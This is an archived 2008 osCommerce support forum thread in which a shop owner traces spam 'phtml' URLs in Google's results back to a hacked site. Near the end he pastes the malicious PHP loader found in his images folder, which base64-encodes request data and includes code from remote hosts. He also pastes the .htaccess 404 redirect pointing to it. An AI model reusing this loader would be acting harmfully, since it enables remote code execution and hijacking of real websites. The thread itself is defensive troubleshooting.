luqi Posted June 1, 2008 Posted June 1, 2008 I was removed from Google search rsults on the plea that my site had some urls showing in search results and they all end with phtml.I can assure you that i do not have any files ,urls ending with phtml but fact remains that when i search in Google with my site name(space) phtml and i find over 200 urls showing against my site ending with phtml.The most interesting thing is that before click it is my website url but after i click it lands on this page one live example is below. http://find.uz/search.php?q=firesrus%20pht...;said=e&d=5 If you visit this page then you can understand that this is deceptive url in Google search results and is not found in my ftp or site at all though before click it was showing in google like.www.mysite.co.uk/catalog/1C.6.0.hasp.crack.phtml - 1k I thought it could be virus so just bought Norton and downloaded my site and scanned all of it and found nothing. I do not understand what is this and how to get rid of this.Google has removed me once and restored my site but out of 1500 urls now i can see about three hundred urls of my site including these phtml urls and it looks like that Google has restricted my site to show less results in view of this problem as these links are changing shape and quantity on daily bases.I have pasted Google's mail below but i have no clue what is my fault and what is wrong i am doing.These urls are not part of my site for which i am penalised. Can any one please throw light on it that what is happening,is it website security issue or server or some other technique hackers are enjoying and making money out of pay per impression etc.In any case bottom line is that how can i get rid of this as this site is my living . Dear site owner or webmaster of (mysite).co.uk/catalog, While we were indexing your webpages, we detected that some of your pages were using techniques that are outside our quality guidelines, which can be found here: http://www.google.com/webmasters/guidelines.html. This appears to be because your site has been modified by a third party. Typically, the offending party gains access to an insecure directory that has open permissions. Many times, they will upload files or modify existing ones, which then show up as spam in our index. The following are some example URLs from your site: mysite.co.uk/catalog/red.hot.tv.hack.pin.phtml www.mysite.co.uk/catalog/Play.Cue.Club.crack.phtml mysite.co.uk/catalog/19629.phtml In order to preserve the quality of our search engine, we have temporarily removed some of your webpages from our search results. Currently pages from firesrus.co.uk/catalog are scheduled to be removed for at least 30 days. We would prefer to have your pages in Google's index. If you wish to be reincluded, please correct or remove all pages (may not be limited to the examples provided) that are outside our quality guidelines. One potential remedy is to contact your web host technical support for assistance. For more information about security for webmasters, see http://googlewebmastercentral.blogspot.com...webmasters.html. When you are ready, please visit https://www.google.com/webmasters/tools/reinclusion?hl=en to learn more and submit your site for reconsideration. Sincerely, Google Search Quality Team
Jack_mcs Posted June 1, 2008 Posted June 1, 2008 It isn't a virus, it's a hack (most likely) so an anti-virus program won't help. I only see 39 pages when I search google for your total listings and those are mostly invalid links. You need to search your files for ones that shouldn't be there. A common trick of hackers is to add code that redirects your pages to some other location so the actual file may not be on your server. If this turns out to be the problem, then you should install the SiteMonitor contribution so you will know if this happens again. Jack Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons
luqi Posted June 1, 2008 Author Posted June 1, 2008 Thanks for your help and i have very heavy loaded oscommerce site with may be hundred additional contributions added to store and above all i am not php expert so is there any way to check which is that file which is redirecting it. I have recently installed site monitor contribution and for future it may help ,but how to get rid of this issue. In my Google webmaster tools i see google getting hold of all these phtml pages as page can not be displayed pages and will eventually remove them but they keep adding by this trick /technique hackers have adopted. It may be some freelancer (hacker) who has done it as i keep hiring them through freelancers website for small little jobs.
spooks Posted June 1, 2008 Posted June 1, 2008 You could try using something like WinMerge to compare your local copy with the server one of your site. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al.
germ Posted June 1, 2008 Posted June 1, 2008 Sam, I can't find your site URL, but check your images folder, and all subfolders, for "bogus" PHP files. They usually have all numbers as names, like "212425.php". There's a "hack" going around that plants these PHP files in your images folder, or any folder with "777" permissions. Folder permissions should be no higher than "755". If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
luqi Posted June 1, 2008 Author Posted June 1, 2008 As a layman i would like to have some guidance as it is not possible for me to go through each and every file and hackers being so clever will very rarely name a file like hackers98765432.php etc as i assume he will try his best to dodge by making very little change in file name from original file which could decive human eyes. To cut the story short please give me your expert openion if it is possible for php programmer to search all site files with www in them.If this could be done then he can forward me all he found and then i could pin point the files having www or redirect which does not concern me or my site contents. It will save lot of labour and waste of time and efforts provided it can be done. I am sure a redirect would always take to www address and not to any other place or is there any technique to over ride this rule also. Your reply with expert openion will be much appreciated please.
germ Posted June 1, 2008 Posted June 1, 2008 I don't know what they may use for a file name. It could be they've added code to your existing file(s). If you can download your sites files to your PC, I'm guessing the rogue code will look something like this: base64_decode("YS5yc2RjcmFmdC53cw==") There's a post around here I can link you to that gives various methods of searching your sites files for code like this (on a Windows PC) if you need. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
luqi Posted June 1, 2008 Author Posted June 1, 2008 Yes please i have already downloaded complete site last night and now keen to know how can i find this code through window pc.Please let me know.
germ Posted June 1, 2008 Posted June 1, 2008 Click Me I would just search for strings like this: base64_decode At least at first. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
luqi Posted June 1, 2008 Author Posted June 1, 2008 All above is very helpful sofar but searching base64_decode produces no results,some other keywords could help as i really do not know what all could be used in such codes to redirect a site. Help appreciated please.
germ Posted June 1, 2008 Posted June 1, 2008 I suppose the next would be the most obvious: phtml If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
luqi Posted June 1, 2008 Author Posted June 1, 2008 Sorry no results produced please.In google if you type firesrus phtml then you can see results and behaviour of such links and it may give you some idea as an expert.
germ Posted June 1, 2008 Posted June 1, 2008 I could guess all day long (which I won't) and still not get any results. There are a million ways to "disguise" code. I think you need to find someone who knows "rogue code" when they see it and give them access to examine the files on your site. But that's just my opinion. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
luqi Posted June 1, 2008 Author Posted June 1, 2008 You are infact right and i will try it but o just searched and could hardly find any experts or company who are in this kind of service.It looks like that it may be very difficult job to perform but anyhow i will continue and get back if some solution is found.It will help others atleast. Kind regards for now and your help is much appreciated.
spooks Posted June 1, 2008 Posted June 1, 2008 I did some searches, and none of the pages found exist anymore. Its possible you`ve disgruntled some coder that put stuff on your site just to mess it up with google, but has now removed it just to mess weith your head. I`ve seen this done before, sorry I can't help with the hows though. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al.
luqi Posted June 1, 2008 Author Posted June 1, 2008 But problem is that code inserted generates more of them and google keeps hunting them .This is going on for few months now.
spooks Posted June 1, 2008 Posted June 1, 2008 Have you checked you`re site log to see if there are any regular accesses from elsewhere, could be you have a back door set up & code is being uploaded that way. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al.
luqi Posted June 1, 2008 Author Posted June 1, 2008 My all permissions are 755 and i frequently change ftp password.
luqi Posted June 1, 2008 Author Posted June 1, 2008 Hi Jim i think i have made little success but not sure as i have found one HTML document with the name of URLF and when opened it says as below.Since you mentioned base64_decode which is exactly as shown in document below.Please let me know what is this. base64_decode PHP 3.0 string base64_decode(string str) Decodes string using MIME base64 algorithm. base64_encode PHP 3.0 string base64_encode(string str) Encodes string using MIME base64 algorithm. parse_url PHP 3.0 array parse_url(string url) Parses a URL and returns its components. rawurldecode PHP 3.0 string rawurldecode(string str) Decodes a URL-encoded string. urldecode PHP 3.0 string urldecode(string str) Decodes URL-encoded string. urlencode PHP 3.0 string urlencode(string str) URL-encodes a string.
germ Posted June 1, 2008 Posted June 1, 2008 If that's all that's in it, it's not harmful. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
luqi Posted June 1, 2008 Author Posted June 1, 2008 There are two more documents namely Configuration\Content\Reference\PHP\Reference.xml and Configuration\CodeColoring\CodeColoring.xml which have appeared in same search and dates are also same when modified. These are very long files so i am not pasting them here but may be you recognise these files or do they look foreigners.
germ Posted June 1, 2008 Posted June 1, 2008 XML doc's aren't dangerous. You need to look for files with PHP, PL or CGI extensions. Most likely PHP If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
luqi Posted June 3, 2008 Author Posted June 3, 2008 I have now got the idea that these urls are outcome of "page can not be displayed" and if you insert any url in google it scans and adds in google search results but when clicked then due to stream not completing it should give page can not be displayed but since in my site there is a command that instead of page can not be displyed show xyz search pages which benefits this hackers. i have noticed a php file in my images folder and contents are below and i am pretty sure this is which is causing problem but just want to be certail before i kill it.please see contents below. <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?> Also in my .htaccess file i could see it outside www and when opened found this. Options -MultiViews ErrorDocument 404 /catalog/images/create.php it looks like some command. Your help will be appreciated please.
germ Posted June 3, 2008 Posted June 3, 2008 Both of those are BAD!!! Nuk'em!!! If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
luqi Posted June 3, 2008 Author Posted June 3, 2008 Hi Jim Thanks for your fast replies and contineous support as that really helped me to resolve this issue. For all others who could face this problem the catch is that:- Your 404 page is diverted to hackers adsense page where he benefits from pay per click etc. How could he do it? A hacker is not only a proper hacker but it could also be any unethical freelancer who is installing your module and you hired him for any small or big job.It could be hacker if your file permissions are below 775 as they can gain access. The catch is that Google accepts thousands of pages like www.yoursite.com/xyz and google straight away accepts such links for search result pages against your site. If you find in Google site:yoursite.com then you must find all listed pages which are also in your ftp and complete stream and also open on net. In case of www.yoursite.com/xyz this page will though list in your site result which is google limitation and i have already notified them that they should only accept live links in site submission . These dead links are not part of your site so they try to show page 404 but code inserted in your site diverts 404 page to hackers favorite page where he makes money. I was surprised to see as who and from where these hundreds of pages are being inserted in Google against my site name and above was final outcome of all this exerscise. Hacker has no job but he keeps adding dead links in google against sites he has hacked and keeps waiting for reward. I hope it should be educational for others as i have tried to write in detail so even newbies could understand this trick. Site monitor could save you from this trouble. Thanks everyone for great help and i wish i could have left it here six months ago and could have avoided so much of business losses which i suffered due to removal from Google.
Recommended Posts
Archived
This topic is now archived and is closed to further replies.